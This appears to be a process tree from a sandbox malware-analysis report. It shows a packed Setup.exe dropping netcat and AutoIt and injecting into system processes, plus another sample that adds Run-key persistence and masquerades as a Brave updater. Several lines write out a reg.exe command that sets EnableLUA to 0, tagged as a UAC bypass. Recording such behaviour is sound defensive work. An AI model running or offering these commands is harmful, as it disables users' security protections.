C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffab0c646f8,0x7ffab0c64708,0x7ffab0c647183⤵PID:4744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,14430627242591806251,10219140666468900276,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:23⤵PID:3228
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,14430627242591806251,10219140666468900276,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:33⤵PID:3772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,14430627242591806251,10219140666468900276,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2696 /prefetch:83⤵PID:5044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14430627242591806251,10219140666468900276,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:13⤵PID:3740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14430627242591806251,10219140666468900276,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:13⤵PID:212
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,14430627242591806251,10219140666468900276,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:13⤵PID:3088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,14430627242591806251,10219140666468900276,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3780 /prefetch:83⤵PID:1840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,14430627242591806251,10219140666468900276,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3780 /prefetch:83⤵PID:2344
-
-
-
C:\Program Files (x86)\Spyware Terminator\Tools\analyzefile.exe"C:\Program Files (x86)\Spyware Terminator\Tools\analyzefile.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3824
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4868
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4356
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2908
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3212
-
C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe"C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe" /SCANCONT "C:\Users\Admin\AppData\Local\Temp\STShellMenu_E61F685.txt"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1508
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
PID:1900 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffac01dcc40,0x7ffac01dcc4c,0x7ffac01dcc582⤵PID:1844
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1864,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1860 /prefetch:22⤵PID:3540
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2204,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2216 /prefetch:32⤵PID:5112
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2208,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2300 /prefetch:82⤵PID:880
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3168,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3192 /prefetch:12⤵PID:1864
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3256,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3420 /prefetch:12⤵PID:3568
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4592,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4608 /prefetch:12⤵PID:4436
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3736,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4796 /prefetch:82⤵PID:4116
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4764,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4524 /prefetch:82⤵PID:5040
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4968,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5000 /prefetch:82⤵PID:4336
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4736,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4732 /prefetch:82⤵PID:3056
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4784,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4848 /prefetch:82⤵PID:4620
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5224,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5232 /prefetch:82⤵PID:2080
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5172,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4760 /prefetch:82⤵PID:2460
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4268,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5168 /prefetch:82⤵PID:3736
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4864,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4928 /prefetch:22⤵PID:2292
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5304,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5316 /prefetch:12⤵PID:2908
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=3352,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3344 /prefetch:12⤵PID:4364
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=5496,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5296 /prefetch:82⤵PID:388
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5164,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4836 /prefetch:82⤵PID:4604
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=4836,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3420 /prefetch:12⤵PID:2988
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=3192,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5132 /prefetch:12⤵PID:3508
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=5368,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4848 /prefetch:12⤵PID:4964
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=5128,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4952 /prefetch:12⤵PID:1628
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=4128,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5152 /prefetch:12⤵PID:2172
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=5612,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5808 /prefetch:12⤵PID:3512
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=240,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4124 /prefetch:82⤵PID:1532
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5844,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6152 /prefetch:82⤵PID:920
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --field-trial-handle=6160,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6184 /prefetch:12⤵PID:328
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5848,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5960 /prefetch:82⤵PID:4400
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5728,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6420 /prefetch:82⤵PID:4316
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --field-trial-handle=6416,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1524 /prefetch:12⤵PID:1112
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --field-trial-handle=6464,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6468 /prefetch:12⤵PID:4208
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6676,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6644 /prefetch:82⤵PID:3976
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6780,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6784 /prefetch:82⤵PID:2456
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --field-trial-handle=6308,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6500 /prefetch:12⤵PID:2864
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --field-trial-handle=6920,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5400 /prefetch:12⤵PID:4412
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6800,i,13846660176358591295,1397887454625224326,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6532 /prefetch:82⤵PID:3696
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:3924
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:4144
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:844
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4fc 0x3e01⤵PID:4788
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap27291:138:7zEvent216631⤵PID:2624
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌b1!\" -an -ai#7zMap22842:210:7zEvent68841⤵PID:476
-
C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe"C:\Program Files (x86)\Spyware Terminator\SpywareTerminator.exe" /SCANCONT "C:\Users\Admin\AppData\Local\Temp\STShellMenu_E6367B8.txt"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2240
-
C:\Users\Admin\Downloads\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌b1!\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌\Setup.exe"C:\Users\Admin\Downloads\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌b1!\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌\Setup.exe"1⤵
- Suspicious use of SetThreadContext
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:1084 -
C:\Users\Admin\AppData\Roaming\danc\PJJBIBGPAFFULS\nc.exeC:\Users\Admin\AppData\Roaming\danc\PJJBIBGPAFFULS\nc.exe2⤵
- Executes dropped EXE
PID:2536
-
-
C:\Windows\SysWOW64\more.comC:\Windows\SysWOW64\more.com2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:4300 -
C:\Users\Admin\AppData\Local\Temp\AutoIt3.exeC:\Users\Admin\AppData\Local\Temp\AutoIt3.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1524
-
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵PID:5040
-
C:\Users\Admin\Downloads\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌b1!\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌\Setup.exe"C:\Users\Admin\Downloads\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌b1!\➤⇌Δ†ε$†➤Sε†μρ➤P@$$ωrÐ➤((9192))-B1➤⇌\Setup.exe"1⤵
- Suspicious use of SetThreadContext
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:2648 -
C:\Users\Admin\AppData\Roaming\danc\PJJBIBGPAFFULS\nc.exeC:\Users\Admin\AppData\Roaming\danc\PJJBIBGPAFFULS\nc.exe2⤵
- Executes dropped EXE
PID:1244
-
-
C:\Windows\SysWOW64\more.comC:\Windows\SysWOW64\more.com2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:1424 -
C:\Users\Admin\AppData\Local\Temp\AutoIt3.exeC:\Users\Admin\AppData\Local\Temp\AutoIt3.exe3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2948
-
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵PID:2988
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap4708:190:7zEvent297621⤵PID:1084
-
C:\Users\Admin\Downloads\0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d.exe"C:\Users\Admin\Downloads\0d4bf4e1a47fa2cfdb5cdc23d8a2b1552c1d82c307e1eec95297e62a478d2f2d.exe"1⤵
- Adds policy Run key to start application
- Adds Run key to start application
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2460 -
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- System Location Discovery: System Language Discovery
PID:4068 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2404
-
-
-
C:\ProgramData\BraveShared\BraveSharedUpdater.exe"C:\ProgramData\BraveShared\BraveSharedUpdater.exe"2⤵
- Adds policy Run key to start application
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:3772 -
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
PID:2180 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:4560
-
-
-
\??\c:\program files (x86)\internet explorer\iexplore.exe"c:\program files (x86)\internet explorer\iexplore.exe"3⤵
- Adds policy Run key to start application
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2344 -
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- System Location Discovery: System Language Discovery
PID:3716 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:3288
-
-
-
C:\Windows\SysWOW64\svchost.exesvchost.exe4⤵
- System Location Discovery: System Language Discovery
PID:4736 -
C:\ProgramData\BraveShared\BraveSharedUpdater.exe"C:\ProgramData\BraveShared\BraveSharedUpdater.exe"5⤵PID:4524
-
